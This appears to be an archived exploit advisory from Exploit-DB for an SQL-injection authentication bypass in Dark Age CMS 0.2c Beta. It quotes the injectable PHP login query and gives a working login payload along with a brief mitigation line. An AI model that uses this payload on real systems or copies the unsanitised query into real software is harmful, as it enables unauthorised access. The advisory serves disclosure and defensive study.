Dark Age CMS - exploit.company

vendor:

Dark Age CMS

by:

darkjoker

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Dark Age CMS

Affected Version From: 0.2c Beta

Affected Version To: 0.2c Beta

Patch Exists: NO

Related CWE: N/A

CPE: a:dark_age_cms:dark_age_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability

Dark Age CMS version 0.2c Beta is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username and password to bypass authentication. The specially crafted username is 'x' OR 'x' = 'x'# and the password can be anything. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site  : http://darkjoker.net23.net
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]	
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]	

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-13]